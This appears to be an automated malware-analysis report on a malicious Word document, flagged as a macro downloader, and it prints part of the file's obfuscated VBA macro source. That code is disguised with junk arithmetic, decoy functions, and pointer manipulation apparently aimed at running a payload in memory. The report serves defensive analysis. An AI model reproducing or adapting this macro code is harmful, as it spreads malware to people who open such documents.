Verdict: MALICIOUS (risk score: 122)
Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file is a Microsoft Office document containing VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon opening. The ClamAV heuristic also flags it as a downloader. While the VBA code is obfuscated, the presence of the Document_Open macro and the downloader heuristic strongly suggests the intent is to fetch and run a secondary payload. No specific family could be identified due to the obfuscation.
Heuristics (4):
- ClamAV: Doc.Downloader.Macro-6539595-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro present
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13205 bytes |

SHA-256 of macros.bas: a61e704674f9e04c2364b338428ffb6bdb09189cb1c8ca2bd66ed79862781eb2
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function headwind(bishops, garrotto, actinism)
Dim aftergame As String
Dim bissextile As String
Dim indispose As LongPtr
Dim climactic As LongPtr
Dim possibility As LongPtr
Dim fusel As Variant
Dim snatch As LongPtr
Dim extractable As LongPtr
discipleship = tail \ 194
tail = Math.Round(239)
climactic = bishops
extractable = actinism
shend = Rnd(341)
snatch = garrotto
dearest = 36 + 48
Pmt 0, dearest, 19055, 37789, 3
mainspring = adenanthera
indispose = 95 - 52 - 44
doctrinally ByVal indispose, _
climactic, _
snatch, extractable, _
possibility
tail = Rnd(352)
End Function
Function trypetidae(affectedly)
Dim otterhound As Byte
Dim translatable As String
Dim salyut As Byte
Dim blahs As String
#If (90 - 102 + 412 + 27 - 92 + 365) > ((17 - 86 + 389) - (77 - 23 + 486) * 1) And ((88 - 42 - 18) - (56 - 31 + 3)) * 2 < (Win64) Then
Dim paean As Variant
Dim polemics As LongPtr
elaine = 16 - 72 + 64
Dim compromise As LongPtr
Dim catholicon As Variant
Dim centennially As Variant
Dim grindery As LongPtr
Dim ebenaceae As Byte
ovate = VarPtr(polemics)
photostat = headwind(ovate, VarPtr(affectedly) + (84 - 44 - 32), elaine)
#ElseIf (101 - 119 + 418 + 56 - 56 + 300) > ((35 - 17 + 302) - (37 - 102 + 605) * 1) And Not ((58 - 2 - 28) - (110 - 35 - 47)) * 2 < (Win64) Then
Dim polemics As Long
elaine = 57 - 19 - 34
Dim compromise As Long
Dim grindery As Long
ovate = VarPtr(polemics)
photostat = tripping(ovate, VarPtr(affectedly) + (101 - 75 - 18), elaine)
#End If
undeservedly = 65 - 3 - 63
compromise = 66 - 17 - 49
severely = 73 - 53 - 20
grindery = 10 - 17 + 9444
camber = 35 - 14 + 4075
barilla = 103 - 42 + 3
dinnertime = valuer(ByVal undeservedly, _
compromise, ByVal severely, grindery, ByVal camber, _
ByVal barilla)
shend = Fix(116)
oxygenase = "allodial"
#If (18 - 13 + 395 + 20 - 128 + 408) > ((2 - 74 + 392) - (13 - 20 + 547) * 1) And ((23 - 51 + 56) - (27 - 88 + 89)) * 2 < (Win64) Then
nidulariales = headwind(compromise, polemics, 107 - 28 + 5804)
#ElseIf (31 - 11 + 380 + 69 - 23 + 254) > ((97 - 112 + 335) - (29 - 43 + 554) * 1) And Not ((48 - 88 + 68) - (111 - 17 - 66)) * 2 < (Win64) Then
hypertensive = tripping(compromise, polemics, 106 - 96 + 5873)
#End If
micrometeoric = 19 + 13
Pmt 0, micrometeoric, 25720, 50442, 3
trypetidae = compromise
End Function
Sub RemovePageNumbersFromCurrentSection()
Dim ThisHeader As HeaderFooter
Dim ThisPageNumber As PageNumber
With Selection.Sections(1)
For Each ThisHeader In .Headers
For Each ThisPageNumber In ThisHeader.PageNumbers
ThisPageNumber.Delete
Next ThisPageNumber
Next ThisHeader
End With
End Sub
Function tripping(blacktopped, circus, lanky)
Dim abundance As Long
Dim carped As Integer
Dim photoelectrically As Long
Dim sago As Byte
Dim saipan As Long
Dim bottomlessness As Long
Dim aeonium As Long
Dim obliterated As Byte
Dim salable As Long
Dim doxepin As Variant
Dim blameworthy As Long
aeroplanist = Rnd(127)
adenanthera = "exigency"
abundance = blacktopped
salable = lanky
discipleship = Fix(414)
saipan = circus
corners = 19 + 3
Pmt 0, corners, 27439, 57255, 2
tail = Rnd(424)
photoelectrically = 62 - 31 - 32
doctrinally ByVal photoelectrically, abundance, saipan, salable, aeonium
tail = Fix(483)
End Function
Sub bicephalous()
Dim attentively As Long
Dim chartism As Long
wake.condylar.Value = Day(#12/5/2013#)
varday = scaramouch = "marattiaceae"
party = "gysart"
bickering = "orycteropus"
comically = "blows"
crackloo = "crosse"
dispraise = congenialness
palanquin = "ampulla"
Set departer = wake.condylar.SelectedItem
scotch = 3 + 59
Pmt 0, scotch, 23121, 25463, 3
laryngeal = departer.Name
query = 68 - 88 + 7864
```

... (truncated)